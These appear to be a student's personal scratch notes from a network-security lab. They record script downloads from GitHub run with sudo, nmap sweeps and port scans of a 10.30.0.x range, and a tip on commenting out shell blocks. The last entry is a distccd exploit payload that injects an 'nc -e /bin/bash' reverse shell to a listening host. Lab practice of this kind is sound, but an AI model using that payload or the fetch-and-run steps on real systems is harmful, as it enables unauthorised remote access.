rm -f netscansth.sh*

wget https://github.com/ElonFrankie/cyberproject/raw/refs/heads/main/
wget -O netscansth.sh "https://github.com/ElonFrankie/cyberproject/raw/refs/heads/main/netscansth.sh?v=1"
wget -O network_scan.sh "https://raw.githubusercontent.com/Tafeman77/cyberproject/refs/heads/main/network_scan.sh?v=1"

netscansth.sh
chmod 744 netscansth.sh
chmod +x netscansth.sh 
dos2unix netscansth.sh //change the fomart of file to linux from windows
sudo apt install dos2unix -y
sudo ./netscansth.sh

sudo nmap -sS -A -Pn -F 10.30.0.250

VS code how to comment a large block lines:
: << 'COMMENT'
这里是你想注释掉的第一行代码 nmap -sS ...
这里是你想注释掉的第二行代码 gobuster ...
这里是你想注释掉的第三行代码 echo "Testing"
COMMENT

####################################
19/05/2026 Tuesday
sudo nmap -sn 10.30.0.0/24
sudo nmap -sn 10.30.0.0/24 | grep "Nmap scan report for" | awk '{print $5}'

# couldn not use this command, it scans all ports: 65535 and make all the vm down
# sudo nmap -Pn -p- --min-rate 2000 -sS -sV -O -v -oA deep_scan_results 10.30.0.1,109,235,236,237,250

#this command only scan 2000-3000 ports
sudo nmap -Pn -p 2000-3000 -sS -sV -O -F --max-retries 1 -v -oN mid_port_scan.txt 10.30.0.1,109,235,236,237,250


20/05/2026:
printf "DIST00000001ARGC00000008ARGV00000002shARGV00000002-cARGV00000031nc -e /bin/bash 192.168.1.120 4444ARGD00000001X" | nc -nv 10.30.0.235 3632



